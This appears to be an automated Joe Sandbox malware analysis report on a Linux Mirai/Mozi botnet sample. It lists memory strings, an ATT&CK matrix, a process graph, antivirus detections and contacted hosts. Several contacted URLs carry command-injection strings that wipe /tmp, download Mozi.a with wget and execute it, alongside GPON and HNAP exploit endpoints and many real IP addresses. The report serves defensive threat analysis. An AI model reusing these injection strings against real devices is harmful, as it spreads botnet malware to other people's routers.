                Source: kvm.sh.8.drBinary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
                Source: functions.sh0.8.drBinary or memory string: qemu-system-ppc64)
                Source: functions.sh0.8.drBinary or memory string: # identify_boot_image qemu-cmd
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_ARG="$2"
                Source: kvm-recheck-rcu.sh.8.drBinary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu_append qemu-cmd
                Source: functions.sh0.8.drBinary or memory string: identify_qemu_vcpus () {
                Source: functions.sh0.8.drBinary or memory string: # qemu-args already contains "-smp".
                Source: kvm-test-1-run.sh.8.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                Source: functions.sh0.8.drBinary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
                Source: functions.sh0.8.drBinary or memory string: echo Cannot figure out what qemu command to use! 1>&2
                Source: functions.sh0.8.drBinary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu_vcpus
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_CMD="$2"
                Source: functions.sh0.8.drBinary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu_args qemu-cmd serial-file
                Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_CMD"
                Source: kvm.sh.8.drBinary or memory string: --qemu-cmd)
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args=$5
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate qemu -append arguments
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu builddir
                Source: functions.sh0.8.drBinary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
                Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
                Source: functions.sh0.8.drBinary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
                Source: kvm.sh.8.drBinary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
                Source: functions.sh0.8.drBinary or memory string: echo qemu-system-i386
                Source: functions.sh0.8.drBinary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
                Source: functions.sh0.8.drBinary or memory string: echo qemu-system-x86_64
                Source: functions.sh0.8.drBinary or memory string: identify_qemu () {

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsCommand and Scripting Interpreter1.bash_profile and .bashrc1.bash_profile and .bashrc1Masquerading1OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Standard Port11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScripting12At (Linux)1At (Linux)1File and Directory Permissions Modification1Brute Force1Remote System Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)1Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Network Configuration Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 402062 Sample: KnAY2OIPI3 Startdate: 01/05/2021 Architecture: LINUX Score: 100 91 185.8.165.103, 7574 MASTER-ASCzechRepublicwwwmasterczCZ Czech Republic 2->91 93 91.39.50.75, 8080 DTAGInternetserviceprovideroperationsDE Germany 2->93 95 103 other IPs or domains 2->95 99 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->99 101 Antivirus detection for dropped file 2->101 103 Antivirus / Scanner detection for submitted sample 2->103 105 7 other signatures 2->105 12 KnAY2OIPI3 2->12         started        14 upstart sh 2->14         started        16 upstart sh 2->16         started        18 upstart sh 2->18         started        signatures3 process4 process5 20 KnAY2OIPI3 12->20         started        22 sh date 14->22         started        24 sh apport-checkreports 14->24         started        26 sh date 16->26         started        28 sh apport-gtk 16->28         started        30 sh date 18->30         started        32 sh apport-gtk 18->32         started        process6 34 KnAY2OIPI3 20->34         started        file7 83 /usr/sbin/alsa-info.sh, ASCII 34->83 dropped 85 /usr/networks, ELF 34->85 dropped 87 /usr/bin/gettext.sh, ASCII 34->87 dropped 89 21 other malicious files 34->89 dropped 107 Sample tries to persist itself using /etc/profile 34->107 109 Drops files in suspicious directories 34->109 111 Sample reads /proc/mounts (often used for finding a writable filesystem) 34->111 113 Sample tries to persist itself using System V runlevels 34->113 38 KnAY2OIPI3 34->38         started        41 KnAY2OIPI3 sh 34->41         started        43 KnAY2OIPI3 sh 34->43         started        45 30 other processes 34->45 signatures8 process9 signatures10 119 Opens /proc/net/* files useful for finding connected devices and routers 38->119 47 KnAY2OIPI3 sh 38->47         started        49 KnAY2OIPI3 sh 38->49         started        51 KnAY2OIPI3 sh 38->51         started        62 5 other processes 38->62 53 sh killall 41->53         started        56 sh iptables 43->56         started        58 sh iptables 45->58         started        60 sh iptables 45->60         started        64 21 other processes 45->64 process11 signatures12 66 sh iptables 47->66         started        69 sh iptables 49->69         started        71 sh iptables 51->71         started        115 Terminates several processes with shell command 'killall' 53->115 117 Executes the "iptables" command to insert, remove and/or manipulate rules 56->117 73 sh iptables 62->73         started        75 sh iptables 62->75         started        77 sh iptables 62->77         started        79 2 other processes 62->79 process13 signatures14 97 Executes the "iptables" command to insert, remove and/or manipulate rules 66->97 81 iptables modprobe 66->81         started        process15

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                KnAY2OIPI368%VirustotalBrowse
                KnAY2OIPI354%MetadefenderBrowse
                KnAY2OIPI369%ReversingLabsLinux.Trojan.Mirai
                KnAY2OIPI3100%AviraLINUX/Mirai.lldau

                Dropped Files

                SourceDetectionScannerLabelLink
                /usr/networks100%AviraLINUX/Mirai.lldau
                /usr/networks54%MetadefenderBrowse
                /usr/networks69%ReversingLabsLinux.Trojan.Mirai

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://pastebin.ca)0%Avira URL Cloudsafe
                http://%s:%d/bin.sh;chmod0%Avira URL Cloudsafe
                http://%s:%d/Mozi.a;chmod0%Avira URL Cloudsafe
                http://127.0.0.1:7574/UD/act?10%VirustotalBrowse
                http://127.0.0.1:7574/UD/act?10%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;$0%Avira URL Cloudsafe
                http://172.82.182.74:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://155.230.225.129:80/HNAP1/0%Avira URL Cloudsafe
                http://134.84.133.102:80/HNAP1/0%Avira URL Cloudsafe
                http://23.78.24.125:80/HNAP1/0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m0%Avira URL Cloudsafe
                http://www.alsa-project.org/cardinfo-db/0%Avira URL Cloudsafe
                http://171.247.8.159:80/HNAP1/0%Avira URL Cloudsafe
                http://66.221.91.189:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://%s:%d/bin.sh0%Avira URL Cloudsafe
                http://www.alsa-project.org/alsa-info.sh0%Avira URL Cloudsafe
                http://199.204.251.131:80/HNAP1/0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;0%Avira URL Cloudsafe
                http://216.164.6.45:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://173.222.98.151:80/HNAP1/0%Avira URL Cloudsafe
                http://%s:%d/Mozi.a;sh$0%Avira URL Cloudsafe
                http://127.0.0.1:80/GponForm/diag_Form?images/0%Avira URL Cloudsafe
                http://168.226.35.54:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://164.132.44.102:80/HNAP1/0%Avira URL Cloudsafe
                http://127.0.0.1:8080/GponForm/diag_Form?images/0%Avira URL Cloudsafe
                http://149.47.68.142:80/HNAP1/0%Avira URL Cloudsafe
                http://127.0.0.10%Avira URL Cloudsafe
                http://www.alsa-project.org0%Avira URL Cloudsafe
                http://127.0.0.1sendcmd0%Avira URL Cloudsafe
                http://182.254.240.127:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://38.35.98.151:80/HNAP1/0%Avira URL Cloudsafe
                http://65.110.89.33:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;/tmp/Mozi.m0%Avira URL Cloudsafe
                http://114.158.233.160:80/HNAP1/0%Avira URL Cloudsafe
                http://92.122.164.134:80/HNAP1/0%Avira URL Cloudsafe
                http://purenetworks.com/HNAP1/0%Avira URL Cloudsafe
                http://www.alsa-project.org.0%Avira URL Cloudsafe
                http://HTTP/1.10%Avira URL Cloudsafe
                http://52.58.36.52:80/HNAP1/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                dht.transmissionbt.com
                212.129.33.59
                truefalse
                  high
                  bttracker.acc.umu.se
                  130.239.18.159
                  truefalse
                    high
                    router.bittorrent.com
                    67.215.246.10
                    truefalse
                      high
                      router.utorrent.com
                      82.221.103.244
                      truefalse
                        high
                        bttracker.debian.org
                        unknown
                        unknownfalse
                          high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:7574/UD/act?1false
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://172.82.182.74:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://155.230.225.129:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://134.84.133.102:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://23.78.24.125:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://171.247.8.159:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://66.221.91.189:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://199.204.251.131:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://216.164.6.45:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://173.222.98.151:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://127.0.0.1:80/GponForm/diag_Form?images/true
                          • Avira URL Cloud: safe
                          unknown
                          http://168.226.35.54:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://164.132.44.102:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://127.0.0.1:8080/GponForm/diag_Form?images/true
                          • Avira URL Cloud: safe
                          unknown
                          http://149.47.68.142:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://182.254.240.127:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://38.35.98.151:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://65.110.89.33:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://114.158.233.160:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://92.122.164.134:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://52.58.36.52:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://pastebin.ca)alsa-info.sh0.8.drfalse
                          • Avira URL Cloud: safe
                          low
                          http://%s:%d/bin.sh;chmodKnAY2OIPI3true
                          • Avira URL Cloud: safe
                          low
                          http://%s:%d/Mozi.a;chmodKnAY2OIPI3false
                          • Avira URL Cloud: safe
                          low
                          http://%s:%d/Mozi.m;$KnAY2OIPI3false
                          • Avira URL Cloud: safe
                          low
                          http://schemas.xmlsoap.org/soap/envelope/KnAY2OIPI3false
                            high
                            http://www.pastebin.ca/upload.phpalsa-info.sh0.8.drfalse
                              high
                              http://%s:%d/Mozi.mKnAY2OIPI3false
                              • Avira URL Cloud: safe
                              low
                              http://www.alsa-project.org/cardinfo-db/alsa-info.sh0.8.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEYalsa-info.sh0.8.drfalse
                                high
                                http://%s:%d/bin.shKnAY2OIPI3true
                                • Avira URL Cloud: safe
                                low
                                http://www.alsa-project.org/alsa-info.shalsa-info.sh0.8.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://%s:%d/Mozi.m;KnAY2OIPI3false
                                • Avira URL Cloud: safe
                                low
                                http://%s:%d/Mozi.a;sh$KnAY2OIPI3false
                                • Avira URL Cloud: safe
                                low
                                http://www.pastebin.ca.alsa-info.sh0.8.drfalse
                                  high
                                  http://schemas.xmlsoap.org/soap/encoding/KnAY2OIPI3false
                                    high
                                    http://127.0.0.1KnAY2OIPI3false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://baidu.com/%s/%s/%d/%s/%s/%s/%s)KnAY2OIPI3false
                                      high
                                      http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/.config.8.drfalse
                                        high
                                        http://www.alsa-project.orgalsa-info.sh0.8.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://127.0.0.1sendcmdKnAY2OIPI3false
                                        • Avira URL Cloud: safe
                                        low
                                        http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblahalsa-info.sh0.8.drfalse
                                          high
                                          http://ipinfo.io/ipKnAY2OIPI3false
                                            high
                                            http://%s:%d/Mozi.m;/tmp/Mozi.mKnAY2OIPI3false
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.pastebin.caalsa-info.sh0.8.drfalse
                                              high
                                              http://purenetworks.com/HNAP1/KnAY2OIPI3false
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.alsa-project.org.alsa-info.sh0.8.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://HTTP/1.1KnAY2OIPI3false
                                              • Avira URL Cloud: safe
                                              low
                                              http://schemas.xmlsoap.org/soap/envelope//KnAY2OIPI3false
                                                high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                59.92.7.51
                                                unknownIndia
                                                9829BSNL-NIBNationalInternetBackboneINfalse
                                                121.97.146.176
                                                unknownPhilippines
                                                6648BAYAN-TELECOMMUNICATIONSBayanTelecommunicationsIncPHfalse
                                                211.35.117.179
                                                unknownKorea Republic of
                                                9643SIGNGATE-ASKICAKRfalse
                                                89.141.126.147
                                                unknownSpain
                                                12430VODAFONE_ESESfalse
                                                123.45.141.9
                                                unknownKorea Republic of
                                                6619SAMSUNGSDS-AS-KRSamsungSDSIncKRfalse
                                                103.139.115.132
                                                unknownSingapore
                                                138893IDNIC-PTPMT-AS-IDPTPRIMAMULTITERMINALIDfalse
                                                130.67.62.44
                                                unknownNorway
                                                2119TELENOR-NEXTELTelenorNorgeASNOfalse
                                                73.11.11.167
                                                unknownUnited States
                                                7922COMCAST-7922USfalse
                                                65.171.3.34
                                                unknownUnited States
                                                1239SPRINTLINKUSfalse
                                                217.151.165.60
                                                unknownIceland
                                                12969VODAFONE_ICELANDISfalse
                                                121.211.248.199
                                                unknownAustralia
                                                1221ASN-TELSTRATelstraCorporationLtdAUfalse
                                                176.23.157.80
                                                unknownDenmark
                                                3292TDCTDCASDKfalse
                                                185.149.152.118
                                                unknownLithuania
                                                15419LRTC-ASLTfalse
                                                68.55.232.254
                                                unknownUnited States
                                                7922COMCAST-7922USfalse
                                                102.198.183.70
                                                unknownunknown
                                                36926CKL1-ASNKEfalse
                                                164.87.137.230
                                                unknownUnited States
                                                721DNIC-ASBLK-00721-00726USfalse
                                                195.167.58.217
                                                unknownGreece
                                                6799OTENET-GRAthens-GreeceGRfalse
                                                197.81.37.161
                                                unknownSouth Africa
                                                10474OPTINETZAfalse
                                                195.220.247.126
                                                unknownFrance
                                                2200FR-RENATERReseauNationaldetelecommunicationspourlaTecfalse
                                                83.177.255.20
                                                unknownSweden
                                                2119TELENOR-NEXTELTelenorNorgeASNOfalse
                                                171.149.135.6
                                                unknownUnited States
                                                9874STARHUB-MOBILEStarHubLtdSGfalse
                                                218.133.250.221
                                                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                                216.155.36.104
                                                unknownUnited States
                                                39855MOD-EUNLfalse
                                                88.128.154.190
                                                unknownGermany
                                                3320DTAGInternetserviceprovideroperationsDEfalse
                                                96.254.228.27
                                                unknownUnited States
                                                5650FRONTIER-FRTRUSfalse
                                                185.8.165.103
                                                unknownCzech Republic
                                                24971MASTER-ASCzechRepublicwwwmasterczCZtrue
                                                38.112.119.34
                                                unknownUnited States
                                                26677ORION-ASNCAfalse
                                                130.196.33.127
                                                unknownUnited States
                                                137ASGARRConsortiumGARREUfalse
                                                119.101.173.5
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                124.26.145.221
                                                unknownJapan2510INFOWEBFUJITSULIMITEDJPfalse
                                                128.109.48.130
                                                unknownUnited States
                                                81NCRENUSfalse
                                                160.20.53.101
                                                unknownHong Kong
                                                58411GTDCL-HKUnitA-E13FGoldenSunCentreHKfalse
                                                65.57.76.79
                                                unknownUnited States
                                                3356LEVEL3USfalse
                                                126.182.147.115
                                                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                                74.26.22.165
                                                unknownUnited States
                                                7922COMCAST-7922USfalse
                                                135.91.62.232
                                                unknownUnited States
                                                10455LUCENT-CIOUSfalse
                                                101.132.239.79
                                                unknownChina
                                                37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                84.203.232.63
                                                unknownIreland
                                                31122DIGIWEB-ASIEfalse
                                                218.85.205.133
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                160.173.189.54
                                                unknownMorocco
                                                6713IAM-ASMAfalse
                                                222.191.119.202
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                53.220.117.17
                                                unknownGermany
                                                31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                                                193.115.92.108
                                                unknownAustralia
                                                7545TPG-INTERNET-APTPGTelecomLimitedAUfalse
                                                38.198.214.3
                                                unknownUnited States
                                                174COGENT-174USfalse
                                                77.94.17.59
                                                unknownKazakhstan
                                                21299KAR-TEL-ASAlmatyRepublicofKazakhstanKZfalse
                                                19.252.51.218
                                                unknownUnited States
                                                3MIT-GATEWAYSUSfalse
                                                29.11.239.185
                                                unknownUnited States
                                                7922COMCAST-7922USfalse
                                                1.151.13.11
                                                unknownAustralia
                                                1221ASN-TELSTRATelstraCorporationLtdAUfalse
                                                216.26.159.203
                                                unknownUnited States
                                                14594PAYMENTALLIANCEUSfalse
                                                49.40.181.238
                                                unknownIndia
                                                55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                                                129.39.197.165
                                                unknownUnited States
                                                2686ATGS-MMD-ASUSfalse
                                                126.66.70.2
                                                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                                171.37.201.166
                                                unknownChina
                                                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                64.227.0.234
                                                unknownUnited States
                                                14061DIGITALOCEAN-ASNUSfalse
                                                167.108.60.0
                                                unknownUruguay
                                                6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                                220.131.247.227
                                                unknownTaiwan; Republic of China (ROC)
                                                3462HINETDataCommunicationBusinessGroupTWfalse
                                                124.106.81.28
                                                unknownPhilippines
                                                9299IPG-AS-APPhilippineLongDistanceTelephoneCompanyPHfalse
                                                222.118.224.59
                                                unknownKorea Republic of
                                                4766KIXS-AS-KRKoreaTelecomKRfalse
                                                32.38.64.238
                                                unknownUnited States
                                                2686ATGS-MMD-ASUSfalse
                                                62.37.123.164
                                                unknownSpain
                                                12479UNI2-ASESfalse
                                                37.198.64.4
                                                unknownSweden
                                                1257TELE2EUfalse
                                                179.5.114.184
                                                unknownEl Salvador
                                                14754TelguaGTfalse
                                                218.99.163.37
                                                unknownChina
                                                17966CIBNChinaInformationBroadcastNetworkLtdCoCNfalse
                                                150.94.181.169
                                                unknownJapan6400CompaniaDominicanadeTelefonosSADOfalse
                                                103.167.29.254
                                                unknownunknown
                                                7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                                133.53.157.82
                                                unknownJapan4729JAEAJapanAtomicEnergyAgencyJPfalse
                                                105.23.23.99
                                                unknownMauritius
                                                37100SEACOM-ASMUfalse
                                                217.26.218.59
                                                unknownUnited Kingdom
                                                31042SERBIA-BROADBAND-ASSerbiaBroadBand-SrpskeKablovskemrezefalse
                                                122.14.26.131
                                                unknownChina
                                                4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                                                165.147.231.202
                                                unknownSouth Africa
                                                5713SAIX-NETZAfalse
                                                27.208.150.177
                                                unknownChina
                                                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                100.58.97.165
                                                unknownUnited States
                                                701UUNETUSfalse
                                                196.2.152.33
                                                unknownSouth Africa
                                                10474OPTINETZAfalse
                                                38.66.167.189
                                                unknownUnited States
                                                22898ATLINKUSfalse
                                                115.216.161.117
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                211.249.221.67
                                                unknownKorea Republic of
                                                7625DAUM-ASKakaoCorpKRfalse
                                                193.63.110.24
                                                unknownUnited Kingdom
                                                786JANETJiscServicesLimitedGBfalse
                                                41.209.27.240
                                                unknownKenya
                                                9129KE-NET2000ZAfalse
                                                91.39.50.75
                                                unknownGermany
                                                3320DTAGInternetserviceprovideroperationsDEtrue
                                                192.170.164.35
                                                unknownUnited States
                                                36315SERVPACUSfalse
                                                123.144.168.163
                                                unknownChina
                                                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                58.178.78.48
                                                unknownAustralia
                                                9443VOCUS-RETAIL-AUVocusRetailAUfalse
                                                72.185.234.219
                                                unknownUnited States
                                                33363BHN-33363USfalse
                                                40.108.216.138
                                                unknownUnited States
                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                54.161.176.221
                                                unknownUnited States
                                                14618AMAZON-AESUSfalse
                                                86.112.104.146
                                                unknownUnited Kingdom
                                                9142CommercialISPGBfalse
                                                56.99.140.32
                                                unknownUnited States
                                                2686ATGS-MMD-ASUSfalse
                                                42.117.16.157
                                                unknownViet Nam
                                                18403FPT-AS-APTheCorporationforFinancingPromotingTechnolofalse
                                                216.144.192.30
                                                unknownUnited States
                                                27553TELNETUSfalse
                                                69.1.46.186
                                                unknownUnited States
                                                12083WOW-INTERNETUSfalse
                                                191.125.31.198
                                                unknownChile
                                                7418TELEFONICACHILESACLfalse
                                                98.125.252.19
                                                unknownUnited States
                                                209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                                172.200.33.30
                                                unknownUnited States
                                                18747IFX18747USfalse
                                                221.136.83.195
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                170.102.192.11
                                                unknownSweden
                                                209236HCLTECHNOLOGIES-SEfalse
                                                124.164.21.186
                                                unknownChina
                                                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                20.177.182.208
                                                unknownUnited States
                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                162.165.207.141
                                                unknownUnited States
                                                21928T-MOBILE-AS21928USfalse
                                                181.228.162.132
                                                unknownArgentina
                                                10481TelecomArgentinaSAARfalse
                                                182.90.150.203
                                                unknownChina
                                                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse

                                                General Information

                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                Analysis ID:402062
                                                Start date:01.05.2021
                                                Start time:17:50:31
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 5s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:KnAY2OIPI3
                                                Cookbook file name:defaultlinuxfilecookbook.jbs
                                                Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
                                                Analysis Mode:default
                                                Detection:MAL
                                                Classification:mal100.spre.troj.evad.lin@0/221@4/0
                                                Warnings:
                                                Show All
                                                • Excluded IPs from analysis (whitelisted): 91.189.92.38, 91.189.92.40, 91.189.92.19, 91.189.92.20, 91.189.92.41, 91.189.92.39
                                                • TCP Packets have been reduced to 100
                                                • Created / dropped Files have been reduced to 100
                                                • Excluded domains from analysis (whitelisted): api.snapcraft.io
                                                • Report size exceeded maximum capacity and may have missing network information.
                                                • VT rate limit hit for: http://%s:%d/Mozi.m;$


                                                Runtime Messages

                                                Command:/tmp/KnAY2OIPI3
                                                Exit Code:0
                                                Exit Code Info:
                                                Killed:False
                                                Standard Output:

                                                Standard Error:telnetd: no process found
                                                utelnetd: no process found
                                                scfgmgr: no process found
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                /bin/sh: 1: cfgtool: not found
                                                /bin/sh: 1: cfgtool: not found
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                dht.transmissionbt.comMGuvcs6OczGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                bin.shGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                iGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                Mozi.mGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                Photo.exeGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                new.exeGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                popcorntime.apkGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                router.bittorrent.comrIbyGX66OpGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                MGuvcs6OczGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                q7uNNDJUI2.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                BQGxKexU78.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                YPJ9DZYIpOGet hashmaliciousBrowse
